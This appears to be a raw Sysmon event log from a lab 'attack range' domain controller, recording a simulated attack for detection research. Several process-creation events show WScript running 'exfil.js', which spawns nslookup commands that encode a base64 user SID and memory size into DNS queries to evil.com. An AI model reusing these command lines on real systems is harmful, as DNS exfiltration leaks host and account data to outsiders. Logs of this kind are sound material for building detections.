10341000x8000000000000000194954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.022{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-103E-000000005F02}5060C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.007{2E1864BB-17A9-629A-103E-000000005F02}50604784C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-0F3E-000000005F02}4176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.006{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-103E-000000005F02}5060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.985{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.985{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.985{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-0F3E-000000005F02}4176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.985{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.985{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.985{2E1864BB-17A1-629A-783D-000000005F02}55527852C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-0F3E-000000005F02}4176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.998{2E1864BB-17A8-629A-0F3E-000000005F02}4176C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmyub.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000195450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.988{2E1864BB-17AA-629A-463E-000000005F02}73085044C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-473E-000000005F02}5620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.973{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-473E-000000005F02}5620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.973{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.973{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.973{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.973{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.973{2E1864BB-17AA-629A-453E-000000005F02}79482952C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-473E-000000005F02}5620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.987{2E1864BB-17AA-629A-473E-000000005F02}5620C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-453E-000000005F02}7948C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlgqr.tmp 2>&1 354300x8000000000000000195442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.790{00000000-0000-0000-0000-000000000000}4672<unknown process>-udptruefalse127.0.0.1-52204-false127.0.0.1-53domain 10341000x8000000000000000195441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.957{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-463E-000000005F02}7308C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.957{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-463E-000000005F02}7308C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.957{2E1864BB-17AA-629A-463E-000000005F02}73085044C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-453E-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.942{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-463E-000000005F02}7308C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.926{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.926{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.926{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-453E-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.926{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.926{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.926{2E1864BB-17A1-629A-783D-000000005F02}55523656C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-453E-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.939{2E1864BB-17AA-629A-453E-000000005F02}7948C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlgqr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.926{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyamrcz.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.910{2E1864BB-17AA-629A-433E-000000005F02}67165624C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-443E-000000005F02}4052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 